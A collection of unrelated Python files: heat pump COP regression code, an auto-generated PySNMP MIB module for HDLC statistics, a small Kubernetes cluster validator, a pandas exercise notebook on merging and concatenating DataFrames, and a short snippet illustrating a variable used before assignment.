t_low_mean = ((ambient_temp_in - ambient_temp_out) / (math.log((ambient_temp_in + 273.15) / (ambient_temp_out + 273.15)))) cop_lorentz = t_high_mean / (t_high_mean - t_low_mean) cop = hp_eff * cop_lorentz return cop def calc_duty(self, capacity): """duty for timestep calculates duty for timestep, ensures this is not exceeded Arguments: capacity {float} -- electrical capacity of heat pump Returns: float -- duty is the thermal output of the heat pump """ duty_max = self.cop * self.elec_capacity if duty_max >= capacity: duty = capacity elif duty_max < capacity: duty = duty_max return duty class GenericRegression(object): """uses generic regression analysis to predict performance see Staffel paper on review of domestic heat pumps for coefficients """ def ASHP_cop(self, flow_temp, ambient_temp): cop = (6.81 - 0.121 * (flow_temp - ambient_temp) + 0.00063 * (flow_temp - ambient_temp) ** 2 ) return cop def ASHP_duty(self, flow_temp, ambient_temp): duty = (5.80 + 0.21 * (ambient_temp) ) return duty def GSHP_cop(self, flow_temp, ambient_temp): cop = (8.77 - 0.15 * (flow_temp - ambient_temp) + 0.000734 * (flow_temp - ambient_temp) ** 2 ) return cop def GSHP_duty(self, flow_temp, ambient_temp): duty = (9.37 + 0.30 * ambient_temp ) return duty def plot_cop(self): x_ambient = np.linspace(-5, 15, num=100) cop_55 = [] for z in range(len(x_ambient)): c = self.ASHP_cop(55, x_ambient[z]) if x_ambient[z] <= 5: c = 0.9 * c cop_55.append(c) cop_45 = [] for z in range(len(x_ambient)): c = self.ASHP_cop(45, x_ambient[z]) if x_ambient[z] <= 5: c = 0.9 * c cop_45.append(c) plt.plot(x_ambient, cop_45, LineWidth=2) plt.plot(x_ambient, cop_55, LineWidth=2) plt.legend(['Flow T 45', 'FLow T 55'], loc='best') plt.ylabel('COP') plt.xlabel('Ambient temperature') plt.show() class StandardTestRegression(object): def __init__(self, data_x, data_COSP, data_duty, degree=2): """regression analysis based on standard test condition data trains a model predicts cop and duty Arguments: data_x {dataframe} -- with flow temps and ambient temps data_COSP {dataframe} -- with cosp data for different data_X data_duty {dataframe} -- with duty data for different data_X Keyword Arguments: degree {number} -- polynomial number (default: {2}) """ self.data_x = data_x self.data_COSP = data_COSP self.data_duty = data_duty self.degree = degree def train(self): """training model """ poly = PolynomialFeatures(degree=self.degree, include_bias=False) X_new = poly.fit_transform(self.data_x) Y_COSP_new = poly.fit_transform(self.data_COSP) Y_duty_new = poly.fit_transform(self.data_duty) model_cop = LinearRegression() model_cop.fit(X_new, Y_COSP_new) model_duty = LinearRegression() model_duty.fit(X_new, Y_duty_new) return {'COP_model': model_cop, 'duty_model': model_duty} def predict_COP(self, model, ambient_temp, flow_temp): """predicts COP from model Arguments: model {dic} -- cop and duty models in dic ambient_temp {float} -- flow_temp {float} -- Returns: float -- predicted COP """ x_pred = np.array([ambient_temp, flow_temp]).reshape(1, -1) poly = PolynomialFeatures(degree=2, include_bias=False) x_pred_new = poly.fit_transform(x_pred) pred_cop = model.predict(x_pred_new) return float(pred_cop[:, 0]) def predict_duty(self, model, ambient_temp, flow_temp): """predicts duty from regression model Arguments: model {dic} -- cop and duty models in dic ambient_temp {float} -- flow_temp {float} -- Returns: float -- predicted COP """ x_pred = np.array([ambient_temp, flow_temp]).reshape(1, -1) poly = PolynomialFeatures(degree=2, include_bias=False) x_pred_new = poly.fit_transform(x_pred) pred_duty = model.predict(x_pred_new) return float(pred_duty[:, 0]) def graphs(self): """OLD testing of how to do regression analysis includes input method, regression, graphing """ path = t.inputs_path() file1 = os.path.join(path['folder_path'], "regression1.pkl") regression1 = pd.read_pickle(file1) path = t.inputs_path() file1a = os.path.join(path['folder_path'], "regression_temp1.pkl") regression_temp1 = pd.read_pickle(file1a) dic = {'flow_temp': [regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0], regression_temp1['flow_temp'][0]]} df = pd.DataFrame(data=dic) data1 = pd.concat([regression1, df], axis=1) path = t.inputs_path() file2 = os.path.join(path['folder_path'], "regression2.pkl") regression2 = pd.read_pickle(file2) path = t.inputs_path() file2a = os.path.join(path['folder_path'], "regression_temp2.pkl") regression_temp2 = pd.read_pickle(file2a) dic2 ={'flow_temp': [regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0], regression_temp2['flow_temp'][0]]} df2 = pd.DataFrame(data=dic2) data2 = pd.concat([regression2, df2], axis=1) path = t.inputs_path() file3 = os.path.join(path['folder_path'], "regression3.pkl") regression3 = pd.read_pickle(file3) path = t.inputs_path() file3a = os.path.join(path['folder_path'], "regression_temp3.pkl") regression_temp3 = pd.read_pickle(file3a) dic3 ={'flow_temp': [regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0], regression_temp3['flow_temp'][0]]} df3 = pd.DataFrame(data=dic3) data3 = pd.concat([regression3, df3], axis=1) path = t.inputs_path() file4 = os.path.join(path['folder_path'], "regression4.pkl") regression4 = pd.read_pickle(file4) path = t.inputs_path() file4a = os.path.join(path['folder_path'], "regression_temp4.pkl") regression_temp4 = pd.read_pickle(file4a) dic4 ={'flow_temp': [regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0], regression_temp4['flow_temp'][0]]} df4 = pd.DataFrame(data=dic4) data4 = pd.concat([regression4, df4], axis=1) regression_data = data1.append([data2, data3, data4]) regression_data = regression_data.dropna() regression_data = regression_data.reset_index(drop=True) #note that ambient temp is column1 and flow_temp is column 2 X = regression_data.drop(columns=['duty', 'capacity_percentage', 'COSP']) Y_COSP = regression_data.drop(columns=['duty', 'capacity_percentage', 'flow_temp', 'ambient_temp']) Y_duty = regression_data.drop(columns=['COSP', 'capacity_percentage', 'flow_temp', 'ambient_temp']) poly = PolynomialFeatures(degree=2, include_bias=False) X_new = poly.fit_transform(X) Y_COSP_new = poly.fit_transform(Y_COSP) model_cop = LinearRegression() model_cop.fit(X_new, Y_COSP_new) model_duty = LinearRegression() model_duty.fit(X_new, Y_duty) x_ambient = np.linspace(-20,20,num=100) df1 = pd.DataFrame(data=x_ambient) x_flow_temp = np.array([50, 55, 60, 65, 70, 75, 80]) df2 = pd.DataFrame(data=x_flow_temp) f_t = [] am = [] for x in range(0, len(x_flow_temp)): for y in range(0, len(x_ambient)): f_t.append(x_flow_temp[x]) am.append(x_ambient[y]) df3 = pd.DataFrame(data=f_t) df3 = df3.rename(columns= {0:'flow_temp'}) df4 = pd.DataFrame(data=am) df4 = df4.rename(columns= {0:'ambient_temp'}) x_test = pd.concat([df4, df3], axis=1) x_test_new = poly.fit_transform(x_test) pred_cop = model_cop.predict(x_test_new) pred_duty = model_duty.predict(x_test_new) fileout = os.path.join(os.path.dirname(__file__), '..', 'outputs', 'heatpump', 'regression_analysis.pdf') pp = PdfPages(fileout) dfs = [] for x in range(0, len(df2)): y1 = x * len(df1) y2 = (x+1) * len(df1) dfs.append(pred_cop[y1:y2]) fig, ax = plt.subplots() for x in range(0, len(df2)): ax.plot(df1, dfs[x][:,0], label = df2[0][x]) ax.legend(title = 'Flow temperatures') ax.scatter(X['ambient_temp'], Y_COSP['COSP']) plt.xlabel('Ambient temp') plt.ylabel('COSP') pp.savefig(bbox_inches='tight') dfs2 = [] for x in range(0, len(df2)): y1 = x * len(df1) y2 = (x+1) * len(df1) dfs2.append(pred_duty[y1:y2]) fig, ax = plt.subplots() for x in range(0, len(df2)): ax.plot(df1, dfs2[x][:,0], label = df2[0][x]) ax.legend(title = 'Flow temperatures') ax.scatter(X['ambient_temp'], Y_duty['duty']) plt.xlabel('Ambient temp') plt.ylabel('duty (kW)') pp.savefig(bbox_inches='tight') pp.close() return
python
# # PySNMP MIB module APTIS-HDLC-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/APTIS-HDLC-MIB # Produced by pysmi-0.3.4 at Wed May 1 11:24:33 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # aptis_generic, = mibBuilder.importSymbols("APTIS-MIB", "aptis-generic") OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint") NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance") ObjectIdentity, Gauge32, iso, Counter64, ModuleIdentity, IpAddress, MibIdentifier, TimeTicks, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, Unsigned32, Counter32, Bits, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Gauge32", "iso", "Counter64", "ModuleIdentity", "IpAddress", "MibIdentifier", "TimeTicks", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Unsigned32", "Counter32", "Bits", "NotificationType") DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention") aptisHdlc = MibIdentifier((1, 3, 6, 1, 4, 1, 2637, 2, 7)) class Index(Integer32): pass aptisHdlcTable = MibTable((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1), ) if mibBuilder.loadTexts: aptisHdlcTable.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcTable.setDescription('These parameters represent statistics for all of the HDLC channels for a single HDLC chip. These are errors that cannot be specified on a specific HDLC channel.') aptisHdlcEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1), ).setIndexNames((0, "APTIS-HDLC-MIB", "aptisHdlcIfIndex")) if mibBuilder.loadTexts: aptisHdlcEntry.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcEntry.setDescription('The Parameters for the all of the HDLC connections for a specific HDLC chip.') aptisHdlcIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 1), Index()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcIfIndex.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcIfIndex.setDescription('The ifIndex value of the corresponding ifEntry.') aptisHdlcReceiveDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 2), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcReceiveDrops.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcReceiveDrops.setDescription('Number of HDLC frames received that were dropped.') aptisHdlcTransmitDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcTransmitDrops.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcTransmitDrops.setDescription('Number of HDLC frames to be transmitted that were dropped.') aptisHdlcSysErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 4), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcSysErrors.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcSysErrors.setDescription('Number of HDLC system errors.') aptisHdlcParityErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 5), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcParityErrors.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcParityErrors.setDescription('Number of HDLC parity errors.') aptisHdlcFCSErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 6), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcFCSErrors.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcFCSErrors.setDescription('Number of HDLC Frame CheckSum errors.') aptisHdlcAborts = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 7), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcAborts.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcAborts.setDescription('Number of HDLC aborts.') aptisHdlcFramingErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 8), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcFramingErrors.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcFramingErrors.setDescription('Number of HDLC framing errors.') aptisHdlcReceiveOverruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 9), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcReceiveOverruns.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcReceiveOverruns.setDescription('Number of HDLC receive overruns.') aptisHdlcTransmitUnderflows = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 10), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcTransmitUnderflows.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcTransmitUnderflows.setDescription('Number of HDLC transmit underflows.') aptisHdlcChannelTable = MibTable((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2), ) if mibBuilder.loadTexts: aptisHdlcChannelTable.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelTable.setDescription('These parameters represent statistics for all of the HDLC channels for a single HDLC chip. These are errors that cannot be specified on a specific HDLC channel.') aptisHdlcChannelEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1), ).setIndexNames((0, "APTIS-HDLC-MIB", "aptisHdlcIfIndex"), (0, "APTIS-HDLC-MIB", "aptisHdlcChannelIfIndex")) if mibBuilder.loadTexts: aptisHdlcChannelEntry.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelEntry.setDescription('The Parameters for the all of the HDLC connections for a specific HDLC chip.') aptisHdlcChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 1), Index()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelIfIndex.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelIfIndex.setDescription('HDLC channel interface index.') aptisHdlcChannelStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("init", 1), ("down", 2), ("disabled", 3), ("smconnnectwait", 4), ("up", 5), ("smdisconnectwait", 6)))).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelStatus.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelStatus.setDescription('This indicates the status of the HDLC Channel.') aptisHdlcChannelRcvFrames = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 3), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvFrames.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvFrames.setDescription('Number of frames received on the HDLC channel.') aptisHdlcChannelRcvOctets = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 4), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvOctets.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvOctets.setDescription('Number of octets received on the HDLC channel.') aptisHdlcChannelRcvDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 5), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvDrops.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvDrops.setDescription('Number of frames received on the HDLC channel that were dropped.') aptisHdlcChannelRcvMaxPacket = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 6), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvMaxPacket.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvMaxPacket.setDescription('Maximum receive packet size on the HDLC channel.') aptisHdlcChannelRcvOverruns = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 7), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvOverruns.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvOverruns.setDescription('Number of frames received on the HDLC channel with overrun errors.') aptisHdlcChannelRcvFCSErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 8), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvFCSErrors.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvFCSErrors.setDescription('Number of frames received on the HDLC channel with frame checksum errors.') aptisHdlcChannelRcvByteAlign = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 9), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvByteAlign.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvByteAlign.setDescription('Number of frames received on the HDLC channel with byte alignment errors.') aptisHdlcChannelRcvAborts = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 10), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelRcvAborts.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelRcvAborts.setDescription('Number of receive attempts on the HDLC channel that were aborted.') aptisHdlcChannelTransmitFrames = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 11), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelTransmitFrames.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelTransmitFrames.setDescription('Number of frames transmitted on the HDLC channel.') aptisHdlcChannelTransmitOctets = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 12), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelTransmitOctets.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelTransmitOctets.setDescription('Number of octets transmitted on the HDLC channel.') aptisHdlcChannelTransmitDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 13), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelTransmitDrops.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelTransmitDrops.setDescription('Number of transmitted frames dropped on the HDLC channel.') aptisHdlcChannelTransmitUnderflows = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 14), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelTransmitUnderflows.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelTransmitUnderflows.setDescription('Number of transmit underflows on the HDLC channel.') aptisHdlcChannelTransmitBuffer = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 2, 1, 15), Counter32()).setMaxAccess("readonly") if mibBuilder.loadTexts: aptisHdlcChannelTransmitBuffer.setStatus('mandatory') if mibBuilder.loadTexts: aptisHdlcChannelTransmitBuffer.setDescription('HDLC channel transmit buffer size.') mibBuilder.exportSymbols("APTIS-HDLC-MIB", aptisHdlcChannelRcvOverruns=aptisHdlcChannelRcvOverruns, aptisHdlcChannelIfIndex=aptisHdlcChannelIfIndex, aptisHdlcChannelRcvFCSErrors=aptisHdlcChannelRcvFCSErrors, aptisHdlcFramingErrors=aptisHdlcFramingErrors, aptisHdlcChannelRcvFrames=aptisHdlcChannelRcvFrames, aptisHdlcTransmitDrops=aptisHdlcTransmitDrops, aptisHdlcChannelTransmitUnderflows=aptisHdlcChannelTransmitUnderflows, aptisHdlcReceiveDrops=aptisHdlcReceiveDrops, aptisHdlcChannelTable=aptisHdlcChannelTable, aptisHdlcChannelTransmitOctets=aptisHdlcChannelTransmitOctets, aptisHdlcChannelTransmitBuffer=aptisHdlcChannelTransmitBuffer, aptisHdlcChannelTransmitFrames=aptisHdlcChannelTransmitFrames, aptisHdlcChannelRcvDrops=aptisHdlcChannelRcvDrops, aptisHdlcChannelTransmitDrops=aptisHdlcChannelTransmitDrops, aptisHdlcChannelEntry=aptisHdlcChannelEntry, aptisHdlcChannelRcvMaxPacket=aptisHdlcChannelRcvMaxPacket, aptisHdlcFCSErrors=aptisHdlcFCSErrors, aptisHdlcParityErrors=aptisHdlcParityErrors, aptisHdlcEntry=aptisHdlcEntry, Index=Index, aptisHdlcChannelStatus=aptisHdlcChannelStatus, aptisHdlcReceiveOverruns=aptisHdlcReceiveOverruns, aptisHdlc=aptisHdlc, aptisHdlcIfIndex=aptisHdlcIfIndex, aptisHdlcTransmitUnderflows=aptisHdlcTransmitUnderflows, aptisHdlcChannelRcvOctets=aptisHdlcChannelRcvOctets, aptisHdlcSysErrors=aptisHdlcSysErrors, aptisHdlcAborts=aptisHdlcAborts, aptisHdlcChannelRcvAborts=aptisHdlcChannelRcvAborts, aptisHdlcChannelRcvByteAlign=aptisHdlcChannelRcvByteAlign, aptisHdlcTable=aptisHdlcTable)
python
from datetime import datetime from validator.kube.resource import KubernetesResourceProvider from validator.base import ClusterResult from validator.namespace import validate_namespaces def run_validate(host, token): provider = KubernetesResourceProvider(host, token) ns = validate_namespaces(provider) now = datetime.now() return ClusterResult(ns, now)
python
#!/usr/bin/env python # coding: utf-8 # # Coding Exercises (Part 1) # ## Full Data Workflow A-Z: Merging, Joining, Concatenating # ### Exercise 12: Merging, joining, aligning and concatenating Data # Now, you will have the opportunity to analyze your own dataset. <br> # __Follow the instructions__ and insert your code! You are either requested to # - Complete the Code and __Fill in the gaps__. Gaps are marked with "__---__" and are __placeholders__ for your code fragment. # - Write Code completely __on your own__ # In some exercises, you will find questions that can only be answered, if your code is correct and returns the right output! The correct answer is provided below your coding cell. There you can check whether your code is correct. # If you need a hint, check the __Hints Section__ at the end of this Notebook. Exercises and Hints are numerated accordingly. # If you need some further help or if you want to check your code, you can also check the __solutions notebook__. # ### Have Fun! # -------------------------------------------------------------------------------------------------------------- # ## Option 1: Self_guided # ### Concatenating DataFrames vertically # __Import__ the cars dataset (with cars from usa and europe) from the csv-file __cars_clean.csv__. <br> # Also __import__ the csv-file __cars_jap.csv__ (with cars from japan) and __concatenate__ both DataFrames __vertically__! <br> # __Save__ the __concatenated DataFrame__ in the variable __cars_all__! <br> # Finally, __sort__ cars_all by the model_year from __low to high__! # ### Left Join # __Import__ the csv-files __summer.csv__ (as summer) and __dictionary.csv__ (as dic) which contains the __full country name__ for the olympic country codes as well as __population__ and __gdp__ statistics for some countries.<br> # # __"Copy and paste"__ the __full country name__, __population__ and __gdp__ from the dic DataFrame __into the summer DataFrame__ with a __Left Join__!<br> # __Save__ the new merged DataFrame in the variable __summer_new__!<br> # # __Inspect__ summer_new and determine the __olympic country codes__ for which the dic DataFrame does __not provide__ any information! # ### Arithmetic operations between DataFrames / Alignment # __Import__ the csv-files __ath_2008.csv__ and __ath_2012.csv__ with all medals winners in the Sport __Athletics__ in the Editions __2008__ and __2012__. # For __all Athletes__ in the two DataFrames, __aggregate/add__ the total number of __Gold__, __Silver__ and __Bronze__ Medals over both editions! __Save__ the aggregated DataFrame in the variable __add__. (Hint: add should contain an index with the Athlete names and three columns, Gold, Silver, Bronze) # __Sort__ add by Gold, Silver, Bronze from __high to low__! Change datatype to __integer__, if necessary! The first Athlete in your DataFrame should be ... no surprise ... Usain Bolt with 6 Gold and 0 Silver and Bronze Medals. # ------------------------------------- # ## Option 2: Guided and Instructed # # STOP HERE, IF YOU WANT TO DO THE EXERCISE ON YOUR OWN! # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # In[ ]: #run the cell import pandas as pd # ### Concatenating DataFrames vertically # In[ ]: #run the cell cars = pd.read_csv("cars_clean.csv") # __Inspect__ the __cars__ DataFrame! # In[ ]: #run the cell cars.head() # In[ ]: #run the cell cars.tail() # In[ ]: #run the cell cars.info() # __Inspect__ the cars_jap DataFrame! # In[ ]: #run the cell cars_jap = pd.read_csv("cars_jap.csv") # In[ ]: #run the cell cars_jap.head() # Before we can concatenate both DataFrames, we need to __align__ them!<br> # 108. __Insert__ the column __origin__ to __cars_jap__ at the most appropriate position! __Fill in the gaps!__ # In[ ]: cars_jap.insert(7, "origin", "japan") # Also the column labels should match. <br> # 109. __Overwrite__ the column labels in __cars_jap__ and use the same column labels that we have in cars! # In[ ]: cars_jap.columns = cars.columns # __Inspect__! # In[ ]: #run the cell cars_jap.head() # 110. __Concatenate__ both DataFrames __vertically__ and create a __new RangeIndex__! __Save__ the new DataFrame in the variable __cars_all__! # In[ ]: cars_all = pd.concat([cars, cars_jap], ignore_index= True) # __Inspect__! # In[ ]: #run the cell cars_all.head() # In[ ]: #run the cell! cars_all.tail() # 111. __Sort cars_call__ by the __model_year__ from __low to high__! Create a __new RangeIndex__ (drop the old)! __Fill in the gaps__! # In[ ]: cars_all = cars_all.sort_values("model_year").reset_index(drop = True) # __Inspect__! # In[ ]: #run the cell cars_all.head() # In[ ]: #run the cell cars_all.tail() # In[ ]: #run the cell cars_all.info() # ---------------------------------------------------------------------- # ### Left Join # In[ ]: # run the cell! summer = pd.read_csv("summer.csv") # __Inspect__ the __summer__ DataFrame! # In[ ]: # run the cell! summer.head() # In[ ]: # run the cell! dic = pd.read_csv("dictionary.csv") # __Inspect__ dict! # In[ ]: # run the cell! dic.head() # __dic__ contains the Olympic Games __Country Codes__ ("Code") with the corresponding __full country names__ ("Country") as well as recent __Population__ and __GDP__ statistics.<br> # 112. __Create__ the columns __Country__, __Population__ and __GDP per Capita__ in the __summer__ DataFrame by using a __Left Join__ with __pd.merge()__. <br> # __Save__ the merged Dataframe in the variable __summer_new__! __Fill in the gaps__! # In[ ]: summer_new = pd.merge(summer, dic, how = "left", left_on= "Country", right_on = "Code") # __Inspect__ summer_new! # In[ ]: # run the cell! summer_new.head() # In[ ]: # run the cell! summer_new.info() # Apparently, __dic__ does __not contain__ additional information for __all olympic country codes__ that are in the __summer__ Dataframe. # 113. __Filter__ summer_new for the elements in the column __Country_x__, where the __corresponding value__ in the column __Code__ is __missing__! <br> # __Count__ the frequency! __Fill in the gaps__! # In[ ]: summer_new.loc[summer_new.Code.isnull(), "Country_x"].value_counts() # For these country codes, we need to find __other sources__ for additional information on the __full country name__, __population__ and __gdp__ (most of these countries do not exist any more.) -> BONUS EXERCISE ;-) # -------------------------- # ### Arithmetic operations between DataFrames / Alignment # In[ ]: #run the cell ath_2008 = pd.read_csv("ath_2008.csv") ath_2012 = pd.read_csv("ath_2012.csv") # __Inspect__ the __ath_2008__ DataFrame. It contains all athletes who won medals in __Athletics__ in the Edition __2008__. # In[ ]: #run the cell ath_2008.head() # In[ ]: #run the cell ath_2008.info() # __Inspect__ the __ath_2012__ DataFrame. It contains all athletes who won medals in __Athletics__ in the Edition __2012__. # In[ ]: #run the cell ath_2012.head() # In[ ]: #run the cell ath_2012.info() # For __all Athletes__ in the two DataFrames, __aggregate/add__ the total number of __Gold__, __Silver__ and __Bronze__ Medals over both editions! __Save__ the aggregated DataFrame in the variable __add__! # 114. First, __set__ the __Athlete__ column as the __index__ in both DataFrames! __Save__ the changes! # In[ ]: ath_2008.set_index("Athlete", inplace= True) # In[ ]: ath_2012.set_index("Athlete", inplace= True) # 115. __Add__ both DataFrames with the __most appropriate method__! __Save__ the resulting DataFrame in the variable __add__! # In[ ]: add = ath_2008.add(ath_2012, fill_value=0) # __Inspect__! # In[ ]: #run the cell add.head(10) # 116. __Sort__ the athletes by the number of __Gold__, __Silver__ and __Bronze__ medals from __high to low__!<br> # __Fill in the gaps!__ Who is the top athlete? # In[ ]: add = add.sort_values(["Gold", "Silver", "Bronze"], ascending = False).astype("int") # In[ ]: # run the cell! add.head() # In[ ]: # run the cell! add.tail() # No surprise, it´s Usain Bolt! # # Well Done! # ------------------------------------------------ # # Hints (Spoiler!) # 108. insert() method, index pos. 7 # 109. columns attribute # 110. pd.concat() method, ignore index # 111. methods sort_values() and reset_index() # 112. left DataFrame: summer, on "Country" and "Code" # 113. methods isnull() and value_counts() # 114. set_index() method # 115. add() method, fill_value = 0 # 116. pass a list of columns to sort_values() method (sequence matters!)
python
# Incorrect order a = 5 b = 5 print(c) c = 6
python
